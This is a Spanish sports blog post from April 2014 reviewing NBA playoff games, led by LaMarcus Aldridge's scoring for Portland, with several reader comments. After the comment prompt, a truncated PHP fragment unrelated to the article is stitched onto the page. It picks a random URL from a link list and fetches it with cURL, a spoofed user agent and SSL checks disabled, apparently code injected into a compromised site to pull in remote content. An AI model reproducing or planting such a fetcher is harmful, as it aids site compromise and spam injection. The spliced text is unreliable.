La Crónica: LAMARCUS ALDRIDGE

24 de April de 2014 por Simon

Otra jornada más de unos Play Off que están resultando igualadísimos. Sólo los Miami Heat, que vencieron ayer a los Bobcats, han sido capaces de mantener el factor cancha en las dos primeras jornadas. Por su parte, los Blazers también están 2-0 pero jugando ambos partidos fuera de su feudo. La otra serie que se jugó ayer es la que enfrenta a Spurs contra los Mavs, que ayer salieron victoriosos del álamo y se hacen con la ventaja de campo en la eliminatoria.

No es que nos sorprenda a estas alturas el gran rendimiento de los Blazers pero que viajen a Oregon después de ganar los dos primeros partidos no estaba en prácticamente ninguna quiniela. Lamarcus Aldridge sigue en estado de gracia y si el primer día fueron 46 puntos, ayer fueron 43. En el primer partido la igualdad fue máxima pero en el encuentro de ayer los Blazers fueron claramente superiores con una buena aportación de Mo Will y Dorrell Wright desde el banquillo. Por parte de Houston, sólo Dwight Howard jugó a un buen nivel mientras que el resto del equipo estuvo muy desacertado. Portland nunca se destacó demasiado en el marcador pero nunca dio la impresión de que Houston pudiera remontar a pesar de tener desventajas de apenas 5 puntos. Tras esta victoria (112-105) los Blazers se ponen 2-0 y gozarán de dos partidos en casa para tratar de cerrar la serie por la vía rápida. Sólo tres veces ha conseguido un equipo remontar una serie después de perder los dos primeros partidos en su casa. Mal augurio para Harden y compañía. 

La serie entre el mejor equipo de la liga y el octavo del Oeste está resultando mucho más equilibrada de lo esperado. Los Mavericks están ofreciendosu mejor versión y están plantando cara a los pupilos del mejor entrenador de la temporada. De hecho, ayer Dallas fue muy superior durante los 48 minutos de encuentro, imponiéndose en todos y cada uno de los parciales del encuentro para sumar su primera victoria de los Play Off de forma amplia y cómoda (113-92). Los de Rick Carlisle consiguieron desactivar el juego ofensivo de San Antonio que  cometieron un número de pérdidas desproporcionado para lo que nos tienen acostumbrados. Sólo Manu Ginobili consiguió escaparse un poco de la teleraña de los Mavs. La serie viaja igualada a Dallas donde el equipo de Mark Cuban tratará de mantener el factor cancha a partir del sábado cuando se disputa el tercer partido de la serie.

Sufrieron mucho pero los Heat ya están 2-0. Un enorme Lebron James guió una vez más a su equipo a la victoria ante unos mermados Bobcats cuya estrella, Al Jefferson, jugó con importantes molestias debido a una fascitis plantar. Un gran primer cuarto de los actuales campeones les ermitió jugar con ventaja todo el partido y llevar a los Bobcats siempre a remolque. Poco a poco Charlotte fue acercándose en el marcador pero se quedaron sin tiempo. Cuando consiguieron ponerse a un solo punto la escasez de tiempo y los tiros libres les impidieron completar la remontada (97-101). Los Bobcats están competiendo mucho mejor de lo esperado y están poneiendo en aprietos a unos Heat que más que despejar dudas las están acrecentando. Si un equipo como Bobcats te crea estos problemas con su mejor jugador jugando con una pierna qué no podrán hacerle a estos Heat un equipo serio.

Ayer se conoció el premio de jugador más mejorado que fue a parar a las manos de Goran Dragic, el gran protagonista de la temporada de los Suns. Hasta el momento parece que todos los premios están siendo merecidísimos y muy justos. Lance Stephenson fue segundo y Anthony Davis tercero. La anécdota del premio la puso Michael Smith (Prime Ticket) que se equivocó al votar pensando que era el MVP y dio sus puntos a Durant, James y Griffin.

PREMIOS

MVP: Si pensamos por un momento que la exhibición del primer partido fue puntual, ayer Lamarcus Aldridge dejó claro que estos van a ser sus playoffs. Los 43 puntos que consiguió ayer le convierten en el tercer jugador en la historia que anota más de 40 puntos en partidos consecutivos a domicilio tras Michael Jordan y Tracy McGrady. Hasta una enorme actuación actuación de Lebron James (32p – 6r – 8a – 4r) quedó en segundo plano.

Sorpresa: Aparte de defender a Lebron, Michael Kidd-Gilchtrist aún tuvo tiempo de anotar 22 puntos y coger 13 rebotes. Shawn Marion fue el mejor de los Mavs con 20 puntos (8 de 10 en TC), 5 rebotes, 2 asistencias, 3 robos y una gran defensa pero su compañero Devin Harris también fue de los destacados con 18 puntos, 4 rebotes y 5 asistencias.

Decepción: Pocas oportunidades tendrán los Rockets si James Harden y Chandler Parsons no están acertados de cara a canasta. Entre ambos solo fueron capaces de anotar 11 de 34 intentos.

Esfuerzo en vano: Dwight Howard fue el único jugador de los Rockets que puso en peligro la victoria de los Blazers. Consiguió 32 puntos, 14 rebotes y 4 tapones con un sorprendente 6 de 7 en tiros libres. Manu Ginobili anotó 27 puntos en solo 12 lanzamientos.

TOP-5

Imágenes | AP Photos / Getty Images

Comenta

4 comentarios a esta entrada

  1. GreenPride dice:
    #1

    Bueno pues me sumo a los comentarios de los actuales PO. De momento me están sorprendiendo gratamente estos PO. Los mejores equipos de la regular no parecen estar muy por encima de los demás lo que nos está dejando unas series muy interesantes e igualadas. Voy a comentar como veo un poco cada una:
    Heat – Bobcats: Los Heat acrecientan las dudas que había sobre ellos con dos victorias bastante flojas sobre los de Charlotte. Estos están compitiendo muy bien y obligando a LeBron a emplearse a fondo. Como en el ultimo mes y medio los Heat no parecen convencidos de lo que hacen y hacen aguas en su defensa lo que les puede traer serios problemas. No parecen el equipo campeón de los dos últimos años aunque teniendo a LeBron todo es posible.
    Pacers – Hawks: Tras un primer partido en el que siguieron su paupérrimo estado de forma y con la espalda contra la pared en el segundo, los Pacers reaccionaron de la mano de George y Scola en la segunda parte para igualar las series. Sin embargo Hibbert parece en otro mundo y en general los Pacers siguen dando sensación de que les cuesta un mundo sumar puntos. En definitiva, no dan seguridad ni para batir a estos limitados Hawks, mucho menos para aspirar al anillo.
    Bulls-Wizards: Los Bulls son un equipo limitado que lo suple todo con adrenalina y buena defensa pero no están pudiendo hacer nada ante un equipo con muchísimos más recursos ofensivos y que les está dando donde más les duele. Dos victorias a domicilio ponen a los Wizards camino de segunda ronda donde pueden ser un rival muy peligroso para ¿Pacers? si Nene, Beal y Wall siguen jugando a este nivel.
    Raptors-Nets: Los Nets impusieron su experiencia y saber hacer frente a los Raptors en el primer partido pero estos se recuperaron con energia en el segundo. La experiencia puede ser un grado y veo a los Nets pasando. Cuaulquiera de los dos (especialmente los Nets) podrían ser un dolor de cabeza para Miami en segunda ronda.
    Spurs-Mavs: Los Mavericks están sorprendiendo y si en el primer partido una reacción de última hora dió la victoria a los de San Antonio, en el segundo ganaron claramente la partida minimizando a Parker y Duncan y teniendo grandes aportaciones de sus mejores jugadores. Panorama preocupante para San Antonio ante un equipo experimentado y que sabe jugar Playoffs y que está sabiendo para el ataque fluido de los Spurs. Esperan dos partidos apasionantes en Dallas. Hay mucha serie
    OKC-Grizzlies: Oklahoma juega a toda pastilla y los Grizzlies en las trincheras, el que impone su ritmo es el que va a ir ganando los partidos. Si los Thunder corren, rebotean y cierran la pintura como en el primero pasarán fácil pero si los Grizzlies consiguen jugar 5×5 y meter buenos balones interiores los de Oklahoma lo van a pasar muy mal como en el segundo. La clase de Durant y cia debería imperar al final pero serán unas series muy duras.
    Clippers-Warriors: Los Warriors sacaron del partido a Griffin en el primero y eso les llevó a la victoria pero los de LA se pusieron las pilas en el segundo y les pasaron por encima. Se antoja clave el duelo de interiores y cómo aprovechen los Clippers a Griffin. Gran serie de DeAndre Jordan por el momento y malísima de Curry que no puede seguir así si su equipo quiere tener opciones. Ahora dos partidos trepidantes en el Oracle de San Francisco que van a dar idea de por donde va esta serie que no está nada claro por donde puede salir.
    Rockets-Blazers: LaMarcus Aldridge. Ese es el nombre de estas series. Dos exhibiciones del ala-pivot del equipo de Oregon les han hecho ganar dos veces en Houston a su equipo y ponen la eliminatoria muy de cara para ellos. Si le marca Jones se mete al poste, si es Howard lo saca fuera, si es Asik se le va por todos lados. Además Houston tuvo un mal Howard el primer día y un horrible Harden el segundo. Parece difícil que Houston pueda dar la vuelta pero la serie no ha acabado….

      Citar

  2. rumbero dice:
    #2

    ¿Harden tirando sólo 4 TL? ¿Y encima expulsado por faltas? Pero esto que es!!
    Lleva dos partidos majos el amigo… tirando con un 29% (mérito tiene la buena defensa de Portland) y siendo un coladero en defensa like always. Aunque lo de la defensa es algo general. Yo esperaba que Houston diera un paso adelante en ese sentido y lo han dado para atrás. Así y con unos Blazers que saben a lo que juegan un Aldridge en plan MVP lo tienen jodido. Otra cosa es pensar ( a toro pasado que siempre es más fácil) que donde está Lin podría estar Lowry y/o Dragic

      Citar

  3. Ruxixon dice:
    #3

    Se le dan palos a Howard -por cierto,gran nivel- por su poca IQ pero Harden tiene tela el amigo.En general ninguno es un prodigio en ese aspecto,quizás Parsons es el que más sabe lo que tiene que hacer en cada momento,a pesar del mal partido.Quiero decir,que con ese tipo de jugadores no están para grandes cotas,aunque no quiero ser oportunista porque,sinceramente,pensaban que de esta ronda pasaban.Y ojo que como caigan y con Melo barruntando,igual lanzan el órdago.

      Citar

  4. oli dice:
    #4

    estoy completamente de acuerdo con lo de Harden no me ha gustado nada los últimos partidos que he visto de él, y estos dos de playoffs especialmente, es un jugador que vive de forzar y simular los contactos para irse al tiro libre y me empieza a caer mal y era un jugador que apreciaba muchisimo, enfrente además esta el mejor jugador de estos playoffs hasta el momento, así que muy complicado lo tienen.

    Es resto de playoffs, como dice Greenpride, muy igualados e interesantes de momento además de Portland, las grandes sorpresas el 0-2 de los Bulls, que no creo que lo remonten, la derrota de ayer de los spurs aunque los sigo viendo favoritos y el 1-1 de pacers haber como evolucionan porque sería muy bueno para la Nba que recuperasen su nivel y plantaran cara a Miami… o Nets jeje.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>